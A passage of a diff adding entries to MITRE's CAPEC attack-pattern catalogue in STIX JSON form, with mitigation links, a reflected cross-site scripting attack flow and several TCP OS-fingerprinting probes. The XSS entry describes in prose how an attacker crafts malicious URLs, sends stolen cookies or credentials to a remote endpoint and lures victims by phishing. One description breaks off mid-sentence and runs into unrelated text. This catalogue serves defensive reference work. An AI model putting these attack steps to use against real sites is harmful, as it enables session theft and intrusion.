"attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a2dd74b7-ad13-4193-b646-3ae46944b3c3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b4100acc-da5c-4fd0-a273-8a3d0fe4ea3f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--63ed5cb5-5feb-4677-8623-3c5552f796ee", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d630925-153a-43e4-a045-6c039ccdbdbe", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9508c797-2ba7-4939-a345-8ab83ec69feb", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9b5c6c90-751d-4b9c-b88f-480109d98c30", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--76657fee-14db-472c-9608-b7bce62e9fb4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary bypasses input validation by using doubled characters in order to perform a cross-site scripting attack. Some filters fail to recognize dangerous sequences if they are preceded by repeated characters. 
For example, by doubling the < before a script command, (<", + "\n Web applications that accept name value pairs in a HTTP Query string are inherently at risk to any value (or name for that matter) that an adversary would like to enter in the query string. This can be done manually via web browser or trivially scripted to post the query string to multiple sites. In the latter case, in the instance of many sites using similar infrastructure with predictable http queries being accepted and operated on (such as blogging software, Google applications, and so on), a single malicious payload can be scripted to target a wide variety of sites.\n Web 2.0 type sites like Technorati and del.icio.us rely on user generated content like tags to build http links that are displayed to other users. del.icio.us allows users to identify sites, tag them with metadata and provide URL, descriptions and more data. This data is then echoed back to any other web browser that is interested in the link. If the data is not validated by the del.icio.us site properly then an arbitrary code can be added into the standard http string sent to del.icio.us by the adversary, for example formatted as normal content with a URL and description and tagged as Java, and available to be clicked on (and executed by) any user browsing for Java content that clicks on this trojaned content.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for public links: Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find.

  2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Probe public links for XSS vulnerability: The adversary uses the public links gathered in the \"Explore\" phase as a target list and requests variations on the URLs they spidered before. They send parameters that include variations of payloads. They record all the responses from the server that include unmodified versions of their script.

  2. Techniques
    Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation." + ], + "x_capec_resources_required": [ + "Ability to send HTTP post to scripting host and collect output" + ], + "x_capec_skills_required": { + "High": "Exploiting any information gathered by HTTP Query on script host", + "Low": "To place malicious payload on server via HTTP" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1cc8dc0d-4869-4cb5-8228-263779929d0c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the 
server side, the client's browser has no way of discerning where the data is originating from.", + "id": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-32-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39f61c35-1731-4cb8-a8eb-bcd81960df63", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b600559a-7621-438f-92e9-088c3cdf5117", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0989752b-6aa5-43c2-afc2-0873faa1782e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00dd576f-a986-4094-aa7c-3eb1b57dc7d3", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc0ab859-a9fe-4f70-a2f6-4e43fa7ba77b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Session tokens for specific host", + "id": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-32-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df6702e1-0cee-4251-8188-443a16f750d1", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5e5619cd-3104-4816-91eb-2836496ecc8c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode", + "id": "course-of-action--39d1f978-5e37-48f2-aa6e-6e8804ec9f1b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-32-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b1356d6-39be-4183-9bbf-e8fa5b7f799e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--39d1f978-5e37-48f2-aa6e-6e8804ec9f1b", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS 
fingerprinting probe examines the remote server's implementation of TCP timestamps. Not all operating systems implement timestamps within the TCP header, but when timestamps are used then this provides the attacker with a means to guess the operating system of the target. The attacker begins by probing any active TCP service in order to get response which contains a TCP timestamp. Different Operating systems update the timestamp value using different intervals. This type of analysis is most accurate when multiple timestamp responses are received and then analyzed. TCP timestamps can be found in the TCP Options field of the TCP header.", + "external_references": [ + { + "external_id": "CAPEC-320", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/320.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--a15fddec-fd55-4c0b-8681-4e57ba5bc20d", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Timestamp Probe", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine if timestamps are present.: The adversary sends a probe packet to the remote host to identify if timestamps are present.

Experiment

  1. Record and analyze timestamp values.: If the remote host is using timestamp, obtain several timestamps, analyze them and compare them to known values.

  2. Techniques
    The adversary sends several requests and records the timestamp values.
    The adversary analyzes the timestamp values and determines an average increments per second in the timestamps for the target.
    The adversary compares this result to a database of known TCP timestamp increments for a possible match.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.The target OS must support the TCP timestamp option in order to obtain a fingerprint." + ], + "x_capec_resources_required": [ + "\n Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.\n A tool capable of sending and receiving packets from a remote system.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe tests the target system's assignment of TCP sequence numbers. One common way to test TCP Sequence Number generation is to send a probe packet to an open port on the target and then compare the how the Sequence Number generated by the target relates to the Acknowledgement Number in the probe packet. 
Different operating systems assign Sequence Numbers differently, so a fingerprint of the operating system can be obtained by categorizing the relationship between the acknowledgement number and sequence number as follows: 1) the Sequence Number generated by the target is Zero, 2) the Sequence Number generated by the target is the same as the acknowledgement number in the probe, 3) the Sequence Number generated by the target is the acknowledgement number plus one, or 4) the Sequence Number is any other non-zero number.", + "external_references": [ + { + "external_id": "CAPEC-321", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/321.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--cd7d1252-30ed-4ba1-a334-52f7a8b7c748", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Sequence Number Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", 
+ "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe sends a number of TCP SYN packets to an open port of a remote machine. The Initial Sequence Number (ISN) in each of the SYN/ACK response packets is analyzed to determine the smallest number that the target host uses when incrementing sequence numbers. This information can be useful for identifying an operating system because particular operating systems and versions increment sequence numbers using different values. 
The result of the analysis is then compared against a database of OS behaviors to determine the OS type and/or version.", + "external_references": [ + { + "external_id": "CAPEC-322", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/322.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2c22407a-efdb-4b20-81f6-ab8a73ded348", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Greatest Common Divisor Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + 
"x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS detection probe measures the average rate of initial sequence number increments during a period of time. Sequence numbers are incremented using a time-based algorithm and are susceptible to a timing analysis that can determine the number of increments per unit time. The result of this analysis is then compared against a database of operating systems and versions to determine likely operation system matches.", + "external_references": [ + { + "external_id": "CAPEC-323", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/323.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network 
Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--4ac0eeac-2467-403a-9c64-be3a7b3f3083", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Counter Rate Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "\n Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.\n A tool capable of sending and receiving packets from a remote system.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. 
Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.", + "external_references": [ + { + "external_id": "CAPEC-324", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/324.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 
51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Sequence Predictability Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. 
Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.", + "external_references": [ + { + "external_id": "CAPEC-325", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/325.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Congestion Control Flag (ECN) Probe", + 